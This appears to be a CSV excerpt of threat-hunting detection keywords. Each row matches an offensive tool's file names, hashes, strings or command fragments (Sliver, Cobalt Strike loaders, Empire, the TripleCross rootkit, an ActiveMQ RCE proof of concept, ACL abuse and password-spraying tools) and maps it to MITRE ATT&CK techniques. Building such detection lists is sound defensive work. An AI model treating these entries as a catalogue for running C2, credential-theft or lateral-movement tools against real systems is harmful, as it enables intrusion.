"*ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782*",".{0,1000}ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52*",".{0,1000}ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd*",".{0,1000}ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450*",".{0,1000}acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c*",".{0,1000}acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*ACBypassTest*",".{0,1000}ACBypassTest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f*",".{0,1000}acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde*",".{0,1000}acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Accenture/Spartacus*",".{0,1000}Accenture\/Spartacus.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*Access_Check -Method PSRemoting*",".{0,1000}Access_Check\s\-Method\sPSRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*AccessTokenImpersonationAccount*",".{0,1000}AccessTokenImpersonationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Accounts with extra permissions.txt*",".{0,1000}Accounts\swith\sextra\spermissions\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*acda6b715fc3fdeed1f43c73e5467f5824093ac0*",".{0,1000}acda6b715fc3fdeed1f43c73e5467f5824093ac0.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684*",".{0,1000}ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*AceLdr.*.bin*",".{0,1000}AceLdr\..{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*AceLdr.zip*",".{0,1000}AceLdr\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*",".{0,1000}acf7a8a9\-3aaf\-46c2\-8aa8\-2d12d7681baf.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*acheron-master.zip*",".{0,1000}acheron\-master\.zip.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ACLight.ps1*",".{0,1000}ACLight\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight.psd1*",".{0,1000}ACLight\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight.psm1*",".{0,1000}ACLight\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight2.ps1*",".{0,1000}ACLight2\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight2.psd1*",".{0,1000}ACLight2\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight2.psm1*",".{0,1000}ACLight2\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight-master*",".{0,1000}ACLight\-master.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*aclpwn -f * -ft computer -t * -tt domain -d * -dry*",".{0,1000}aclpwn\s\-f\s.{0,1000}\s\-ft\scomputer\s\-t\s.{0,1000}\s\-tt\sdomain\s\-d\s.{0,1000}\s\-dry.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*aclpwn.py*",".{0,1000}aclpwn\.py.{0,1000}","offensive_tool_keyword","Aclpwn","Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn","T1098 - T1208 - T1550 - T1484 - T1486","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/aclpwn.py","1","0","N/A","N/A","7","673","106","2021-11-18T03:47:24Z","2018-12-04T18:45:04Z" "*ACLScanner.exe*",".{0,1000}ACLScanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*acltoolkit *",".{0,1000}acltoolkit\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit.git*",".{0,1000}acltoolkit\.git.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-ad*",".{0,1000}acltoolkit\-ad.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-main*",".{0,1000}acltoolkit\-main.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acronis_trueimage_xpc_privesc*",".{0,1000}acronis_trueimage_xpc_privesc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*AcroRd32.exe FUZZ*",".{0,1000}AcroRd32\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*Action: Locating SCCM Management Servers*",".{0,1000}Action\:\sLocating\sSCCM\sManagement\sServers.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*Action: Locating SCCM Servers in Registry*",".{0,1000}Action\:\sLocating\sSCCM\sServers\sin\sRegistry.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*action=SchTaskCOMHijack *",".{0,1000}action\=SchTaskCOMHijack\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*Activate all of rootkit's hooks*",".{0,1000}Activate\sall\sof\srootkit\'s\shooks.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*activate_command_control_shell(*",".{0,1000}activate_command_control_shell\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*activate_command_control_shell_encrypted(*",".{0,1000}activate_command_control_shell_encrypted\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Activated COMMAND & CONTROL encrypted shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sencrypted\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Activated COMMAND & CONTROL shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Activating COMMAND & CONTROL with MULTI-PACKET backdoor trigger*",".{0,1000}Activating\sCOMMAND\s\&\sCONTROL\swith\sMULTI\-PACKET\sbackdoor\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*activedirectory/pwns.go*",".{0,1000}activedirectory\/pwns\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*ActiveMQ-RCE -i *",".{0,1000}ActiveMQ\-RCE\s\-i\s.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*ActiveMQ-RCE.exe*",".{0,1000}ActiveMQ\-RCE\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*activeScan++.py*",".{0,1000}activeScan\+\+\.py.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","574","182","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*AD LDAP Command Line Searching that doesn't suck.*",".{0,1000}AD\sLDAP\sCommand\sLine\sSearching\sthat\sdoesn\'t\ssuck\..{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*AD Privesc Automation*",".{0,1000}AD\sPrivesc\sAutomation.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*ad_dns_dump.txt*",".{0,1000}ad_dns_dump\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*AD_Enumeration_Hunt.ps1*",".{0,1000}AD_Enumeration_Hunt\.ps1.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","AD Enumeration","7","1","92","19","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" 